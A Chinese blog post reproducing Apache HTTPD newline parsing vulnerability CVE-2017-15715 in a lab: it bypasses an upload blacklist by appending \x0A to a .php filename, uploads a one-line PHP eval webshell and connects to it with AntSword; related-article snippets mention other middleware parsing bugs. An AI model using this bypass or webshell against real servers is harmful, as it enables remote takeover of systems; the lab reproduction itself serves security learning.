中间件漏洞 | Apache-换行解析

已于 2022-10-25 18:10:58 修改
阅读量258 收藏
点赞数
分类专栏: 中间件漏洞 文章标签: apache php 开发语言
于 2022-10-25 18:07:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52116519/article/details/127515666
版权

文章目录

靶场列表

在这里插入图片描述

靶场:CVE-2017-15715
1 靶场介绍

Apache HTTPD 换行解析漏洞
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A(\x0A为换行符)将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

2 漏洞验证
  1. 访问,发现有文件上传点
    在这里插入图片描述
  2. 随意上传一个后缀名为php的文件,拒绝上传
    在这里插入图片描述
  3. 抓包
    在这里插入图片描述
  4. 1.php后添加\x0A
    在这里插入图片描述
  5. 访问http://20.210.90.167:8080/1.php%0A成功

在这里插入图片描述

3 漏洞利用
  1. 写马
    <?php phpinfo();@eval($_POST[1]);?>
    在这里插入图片描述
  2. 访问成功
    在这里插入图片描述
  3. 蚁剑连接
    在这里插入图片描述
    在这里插入图片描述
c4fx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件上传之中间件解析漏洞详解
永远是少年
10-01 2297
今天继续给大家介绍渗透测试相关知识,本文主要内容是文件上传之中间件解析漏洞详解。 一、IIS解析漏洞 二、Apache解析漏洞 三、Nginx解析漏洞
中间件漏洞Apache HTTPD 漏洞全集复现(基于Vulhub平台)
Continuejww的博客
09-11 727
①CVE-2017-15715 ②多后缀解析漏洞 ③远程命令执行漏洞 ④CVE-2021-41773 ⑤CVE-2021-42013 ⑥CVE-2021-40438
Apache 中间件漏洞(换行解析)详解
xinyue9966的博客
02-17 3674
介绍 Apache(音译为阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将Perl/Python等解释器编译到服务器中。 简而言之,Apache服务器不仅简单好用,还能支持HTML、PHP、Perl、Python等基础语言。 目录介绍 bin-------存放常用的命令工具,例如httpd cgi-bin---存放Linux下常用的命令,例如xxx.sh co
中间件漏洞总结
热门推荐
shayebudon的博客
04-02 1万+
一、IIS 1.iis6.0解析漏洞 该版本默认将*.asp;.jpg此类格式的文件名,当成asp解析,服务器默认;后面的内容不解析,相当于截断,例如上传asp木马,就可以用xx.asp;.jpg来绕过;iis除了会将asp解析成脚本执行文件之外,还会将 cer cdx asa扩展名解析成asp 防御方法: 1.禁止上传和创建此类畸形文件 2.图片存放目录设置为禁止脚本执行 2.iis6 PUT漏洞 IIS Server在web中开启了webDAV 配置了可以写入的权限,造成了任意文件上传。 防御方法: 1
Apache HTTPD 换行解析漏洞(CVE-2017-15715)
qq_46081990的博客
05-28 257
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
Apache换行解析漏洞复现(CVE-2017-15715)
爱吃仡坨的Blog
10-13 2031
CVE-2017-15715 即为换行解析漏洞,此漏洞存在于Apache 2.4.0 - 2.4.29版本中;在解析PHP时,服务器会将shell.php%0a后缀之后带有空格的文件按照php后缀解析,从而可以绕过服务器的安全策略。
Apache HTTPD 换行解析漏洞(CVE-2017-15715)复现(vulhub)
qq_51398553的博客
06-18 309
可以看到,在该配置文件中,前三行的意思是将所有以.php为后缀的文件内容当作php文件进行解析,但使用$符对文件进行匹配。定位文件末的方法:在右边找到文件名,然后在左边对应的Hex值的后面有0d0a,0d是回车,0a是换行,在0d的前面插入0a。值得注意的是,当我用Tab键补全的时候,终端换行了,也可以说明文件名确实有换行符的存在。从源代码中可以看出,网站对文件的后缀名进行了过滤,将以phpphp3,php4,php5,phtml以及pht为后缀的文件名放入黑名单。,拉取镜像,并查看服务相关信息。
Apache换行解析漏洞(CVE-2017-15715)
m0_51589948的博客
07-25 548
Apache换行解析漏洞(CVE-2017-15715) 影响版本 Apache httpd 2.4.0 ~ 2.4.29 原理 apache在修复第一个后缀名解析漏洞时,用正则表达式匹配后缀。在正则表示式中,$用来匹配字符串结尾位置,但如果设置了RegExp对象的Multiline属性,$也匹配\n或者\r, #httpd解析php文件的表达式 <FilesMatch \.php$> SetHandler application/x-httpd-php </Files
Apache JMeter (apache-jmeter-5.5.zip)
06-24
Apache JMeter (apache-jmeter-5.5.zip)可用于测试静态和动态资源、Web 动态应用程序的性能。 它可用于模拟服务器、服务器组、网络或对象上的重负载,以测试其强度或分析不同负载类型下的整体性能。 Apache JMeter...
Apache JMeter (apache-jmeter-5.5.tgz)
06-24
Apache JMeter (apache-jmeter-5.5.tgz)可用于测试静态和动态资源、Web 动态应用程序的性能。 它可用于模拟服务器、服务器组、网络或对象上的重负载,以测试其强度或分析不同负载类型下的整体性能。 Apache JMeter...
Apache JMeter (apache-jmeter-5.5_src.tgz 源码)
06-24
Apache JMeter (apache-jmeter-5.5_src.tgz 源码)可用于测试静态和动态资源、Web 动态应用程序的性能。 它可用于模拟服务器、服务器组、网络或对象上的重负载,以测试其强度或分析不同负载类型下的整体性能。 ...
中间件-apache-geode-1.6.0
09-07
最新版的apache-geode-1.6.0 ,下载了就要好好学习,研究
Apache Doris】周FAQ集锦:第 5 期
ith321的博客
06-09 1065
Apache Doris】周FAQ集锦:第 5 期
零基础直接上手java跨平台桌面程序,使用javafx(四)用Apache POI读取excel文件。
mrdzhu的博客
06-11 380
打开项目,点文件|项目结构|模块|依赖|1从JAR或目录,选中"D:\java\jdk\poi-bin-5.2.3"包括子目录的全部JAR文件,并且把前面的勾打上,点应用和确定。我是嫌麻烦,把子目录的全拷到上面了,所以显示的是46个文件。1、下载Apache POI,本来是个很简单的事情,但是也有坑。这也就是我一直不敢用java的原因之一,这些莫名其妙的坑,总是让人烦躁。我们打开官网,发现他已经不发编译好的包了,发的是源代码。亏好我眼尖,在最下方,有5.23的老版,可以用一下。也没多老,还能接受。
红队攻防渗透技术实战流程:中间件安全:IIS&NGINX&APACHE&TOMCAT
HACKONE的博客
06-15 58
当存在漏洞的Tomcat运行在Windows/Linux主机上, 且启用了HTTP PUT请求方法( 例如, 将readonly初始化参数由默认值设置为false) , 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP的webshell文件,JSP文件中的恶意代码将能被服务器执行, 导致服务器上的数据泄露或获取服务器权限。其2.4.0~2.4.29版本存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
小阿轩yx-Apache 网页优化
2401_83435725的博客
06-15 554
小阿轩yx-Apache 网页优化
Apache网页优化
最新发布
m0_64000472的博客
06-15 848
注意文章中的http为源代码包安装,配置时指定了mod_deflate、mod_expires、mod_rewrite模块。所有的模块是否生效可以通过在浏览器中找到"开发工具"中的网络选项卡中的信息进行验证,里面有请求报文和响应报文的部分信息。通过对网页资源进行压缩,之后再传输可以提升Apache应用程序的速度。有一个方法就是gzip。
Apache、Nginx、IIS中间件 存在哪些解析漏洞
03-25
Apache、Nginx、IIS等中间件存在许多不同的解析漏洞,以下是其中一些常见的漏洞: 1. Apache - CVE-2019-0211:存在漏洞可允许攻击者在服务器上执行任意代码 - CVE-2019-0196:存在漏洞可允许攻击者通过目标Web...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值